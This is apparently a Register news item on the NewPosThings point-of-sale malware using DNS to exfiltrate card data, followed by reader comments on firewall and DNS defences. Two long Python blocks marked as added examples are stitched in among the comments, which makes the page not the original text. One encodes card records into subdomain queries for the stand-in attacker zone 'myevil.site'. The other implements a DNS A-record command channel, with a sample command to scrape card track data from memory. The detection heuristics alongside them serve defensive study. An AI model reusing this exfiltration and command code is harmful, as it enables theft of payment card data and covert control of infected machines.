VXers pass stolen card data over DNS

The NewPosThings malware has spawned an offspring that exploits the DNS protocol to sneak data past firewalls. The VXers have reasoned that DNS has a couple of advantages for data exfiltration. Since the enterprise network can't talk to the Internet without it, it's unlikely to be blocked; and since it's probably thought of as more …

  1. Number6

    I assume the quick fix to that is to run your own local DNS server(s) and block DNS at the firewall for any local IP/MAC address except that of the server. That forces everyone on your network to use your local DNS rather than use Google or OpenDNS. An exploit that was good enough to be able to spoof the DNS IP/MAC might still get around it. It also assumes that the local DNS won't forward incomprehensible packets on the basis that it wouldn't know where to send them.

  2. chris 17 Bronze badge

    The fix is just to permit DNS to known external DNS servers (Google, BT etc.).

    The better fix is to just permit specific internal hosts (like the internal DNS system) access to external DNS, blocking all and sundry access.

    If you're processing PCI DSS, no internal host should be allowed to connect to an external host without first passing through a proxy (no, not just a web proxy): the initial connection must be to a trusted internal host, and that must then spawn a new connection to the external third party.

  3. Anonymous Coward

    Those fixes aren't enough

    How would limiting access to other DNS servers but permitting normal access from your internal DNS server prevent this sort of thing?

    If I were wanting to pass card details over DNS, I'd query something like:

    56.10.59.10.81.01.82.50.myevil.site (obviously with a valid TLD).

    Hosting my own authoritative server for myevil.site and enabling logging (effectively) is all that is needed.

    That could be extended simply enough to include card validity and CVV number etc.

    This is an old trick. Someone even built an HTTP proxy around this idea (to get free service on walled-garden hotspots)

    1. Paul Crawford Silver badge

      Re: Those fixes aren't enough

      Very good point.

      However, would all sorts of requests to some odd domain not trip any decent intrusion detection system? Or am I being naive about how good such "enterprise" tools actually are in practice?
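The following Python is an added example, not code from the article, from NewPosThings, or from any commenter. It shows both halves of the Anonymous Coward's sketch: packing bytes into labels under an attacker-controlled zone (myevil.site is the domain the comment uses; the base32 framing is an assumption), and the kind of log heuristic Paul Crawford is asking about, run over a constructed query log. The example.com/example.net entries, the fake card records and the thresholds are all constructed for the demonstration.

```python
"""Added example (not from the article or any commenter): data packed into DNS
labels the way the comment above sketches, plus a log heuristic to spot it.
Zone name, framing and thresholds are assumptions, not anything from NewPosThings."""
import base64
import math
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # practical limit for a name in dotted text form


def encode_exfil(payload: bytes, domain: str) -> str:
    """Attacker side: base32 (valid hostname characters, case-insensitive),
    padding stripped, split into 63-char labels under the collection zone."""
    b32 = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    qname = ".".join(labels + [domain])
    if len(qname) > MAX_NAME:
        raise ValueError("payload does not fit in one query; split it across several")
    return qname


def decode_exfil(qname: str, domain: str) -> bytes:
    """What the attacker's authoritative server does with each logged query."""
    suffix = "." + domain.lower()
    if not qname.lower().endswith(suffix):
        raise ValueError("query is not under the collection zone")
    b32 = "".join(qname[:-len(suffix)].split(".")).upper()
    b32 += "=" * (-len(b32) % 8)     # restore the padding stripped above
    return base64.b32decode(b32)


def shannon_entropy(text: str) -> float:
    """Bits per character: 'www' or 'mail' score low, encoded blobs score high."""
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_zones(qnames, min_unique=20, min_label=20, min_entropy=2.0):
    """Defender side: flag zones that receive many distinct, long, high-entropy
    leftmost labels. 'Zone' here is the last two labels, an assumption that
    breaks on co.uk-style suffixes; real tooling should consult the Public Suffix List."""
    per_zone = defaultdict(set)
    for q in qnames:
        name = q.lower().rstrip(".")
        per_zone[".".join(name.split(".")[-2:])].add(name)
    flagged = set()
    for zone, names in per_zone.items():
        leftmost = [n.split(".")[0] for n in names if n != zone]
        if len(leftmost) < min_unique:
            continue
        mean_len = sum(len(lab) for lab in leftmost) / len(leftmost)
        mean_ent = sum(shannon_entropy(lab) for lab in leftmost) / len(leftmost)
        if mean_len >= min_label and mean_ent >= min_entropy:
            flagged.add(zone)
    return flagged


def build_sample_log():
    """Constructed query log: a little ordinary traffic plus 25 fake card
    records (not real PANs) exfiltrated one query each."""
    benign = ["www.example.com", "mail.example.com", "cdn.example.com",
              "api.example.com", "updates.example.net", "time.example.net"]
    records = [
        f"{4000000000000000 + i * 987654321}|{i % 12 + 1:02d}/2{i % 10}|{(i * 37) % 1000:03d}".encode()
        for i in range(25)
    ]
    return benign + [encode_exfil(r, "myevil.site") for r in records]


if __name__ == "__main__":
    print(encode_exfil(b"4111111111111111|12/25|123", "myevil.site"))
    print(suspicious_zones(build_sample_log()))
```

The detection side is deliberately crude: it counts distinct subdomains per zone and looks at the length and entropy of the leftmost label, which is roughly what commercial DNS analytics do before adding a domain-age or reputation lookup. A slow exfiltration (a few queries an hour) stays under the uniqueness threshold, which is why the allowlist approaches in the other comments are the stronger control for a fixed-function POS network.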

  4. AustinTX

    What you want to do is transparently redirect all traffic on the DNS port to your internal DNS server. This way, you benefit from security alerts when those seemingly-corrupt packets from infected machines are logged. DNS (and SMTP) redirection is standard for captive portals (public wifi hotspots). If you don't capture the DNS, then a bit of software on your portable can tunnel everything over 53 TCP and you get free wifi.

  5. jon909

    Hackers only need to look up an A record for a (sub)domain they control. The victim's IP and credit card(s) can be encrypted and encoded into an ASCII DNS name, e.g. ip.creditcard.compromised.dyndns.org

    The lookup might fail, but the hackers' DNS server would have a log of the lookup, or they could just reply with whatever data they want, i.e. an IP that's really a fragment of remote command data.

    Therefore remote command requests and replies wouldn't even need to rely on TXT records and any usual proxying and UDP/TCP filtering of port 53 would not help.

    I guess the thing to look out for is to be suspicious of A records that aren't the root or www AND to clamp down on excessive lookups on the same domain.

    Practical solution? Get payment service providers to host "secure DNS".
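As an added example (not jon909's code and not NewPosThings), here is the return path the comment describes: the operator's authoritative server answering A-record lookups with addresses that are really 4 bytes of command data, and the infected host polling until it has the whole message. The zone myevil.site, the `<n>.<session>.cmd.` query layout and the 2-byte length prefix are assumptions; the server is an in-memory stand-in with no sockets, so the exchange runs offline.

```python
"""Added example (not jon909's code, not NewPosThings): a command channel in
which A-record answers carry 4 bytes of operator data each. The zone, the
'<n>.<session>.cmd.' query layout and the 2-byte length prefix are assumptions;
the server is an in-memory stand-in for the attacker's authoritative nameserver."""
import ipaddress
import struct


def command_to_answers(command: bytes):
    """Operator side: 2-byte big-endian length, the command, zero padding to a
    multiple of 4, then one IPv4 address per 4-byte chunk."""
    framed = struct.pack("!H", len(command)) + command
    framed += b"\x00" * (-len(framed) % 4)
    return [str(ipaddress.IPv4Address(framed[i:i + 4])) for i in range(0, len(framed), 4)]


class OperatorServer:
    """Stand-in for the attacker's authoritative server. It logs every query
    (the exfil side of the comment) and answers chunk lookups from a queue."""

    def __init__(self, zone: str):
        self.zone = zone.lower()
        self.queued = {}     # session -> list of IPv4 strings
        self.log = []

    def queue_command(self, session: str, command: bytes):
        self.queued[session] = command_to_answers(command)

    def resolve(self, qname: str):
        """Return an IPv4 string, or None where a real server would say NXDOMAIN."""
        name = qname.lower().rstrip(".")
        self.log.append(name)
        suffix = "." + self.zone
        if not name.endswith(suffix):
            return None
        labels = name[:-len(suffix)].split(".")
        if len(labels) != 3 or labels[2] != "cmd" or not labels[0].isdigit():
            return None
        idx, session = int(labels[0]), labels[1]
        answers = self.queued.get(session, [])
        return answers[idx] if idx < len(answers) else None


def fetch_command(resolve, zone: str, session: str):
    """Victim side: look up chunk 0, 1, 2, ... until the length prefix says the
    whole command has arrived. Only ordinary A-record lookups cross the perimeter."""
    raw = b""
    idx = 0
    while True:
        ip = resolve(f"{idx}.{session}.cmd.{zone}")
        if ip is None:
            return None                      # nothing queued, or channel lost
        raw += ipaddress.IPv4Address(ip).packed
        (length,) = struct.unpack("!H", raw[:2])
        if len(raw) >= 2 + length:
            return raw[2:2 + length]
        idx += 1


def demo_exchange(command: bytes = b"scrape track2 from ram"):
    """Run one full exchange in memory; return (command received, queries logged)."""
    server = OperatorServer("myevil.site")
    server.queue_command("s1", command)
    received = fetch_command(server.resolve, "myevil.site", "s1")
    return received, len(server.log)


if __name__ == "__main__":
    print(demo_exchange())
```

Nothing here touches TXT records, and every answer is a syntactically valid IPv4 address, which is the comment's point: a port-53 filter that only checks record types or well-formedness sees a normal lookup. Some of the generated addresses fall in reserved or private ranges (0.0.0.0/8, 10.0.0.0/8), which is one cheap anomaly a resolver log review can look for: an external zone that hands back addresses a client could never reach.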

  6. Pseudonymous Diehard

    Wouldn't

    The practical solution to this be putting POS systems on an isolated network of their own with no net access?

    1. Alister Silver badge

      Re: Wouldn't

      Wouldn't the practical solution to this be putting POS systems on an isolated network of their own with no net access?

      Don't POS systems require net access to carry out card verification etc?

      1. Anonymous Coward

        Re: Wouldn't

        But this issue is not limited to POS evilness - the principle can be used anywhere...

      2. Anonymous Coward

        Re: Wouldn't

        Yes, but as said: block DNS out, allow connections to the servers and ports needed, block everything else, have your own DNS server but disable recursion, and manually add entries to your internal DNS for all the domains you need.

  7. Walter Bishop Silver badge
    Joke

    A new variant of a POS malware

    When will people stop using this defective Android malware vector on the Intertubes.

  8. knightred

    What a cool problem.

    The way I see the problem, as pointed out already, everybody uses a card to buy things, and a shop must check if the card will give them money before selling things. So without an instant credit check a shop would be defrauded out of business, and with a queued delay nobody would shop there. <blah blah> Therefore you can't explicitly stop DNS... but it seems a POS device should probably really only ever need to look up one domain. I can see why that's slightly less than desirable, but does it really need to look up xyz.com? No, all it needs is primarycardprocessor.com and possibly secondarycardprocessor.com.

    I have lost my train. I think the solution is to use some form of payment that would be transferable from person to person without relying on the Internet. Perhaps there could be different types that would represent different values? I don't know we'd have to think about it.

Biting the hand that feeds IT © 1998–2019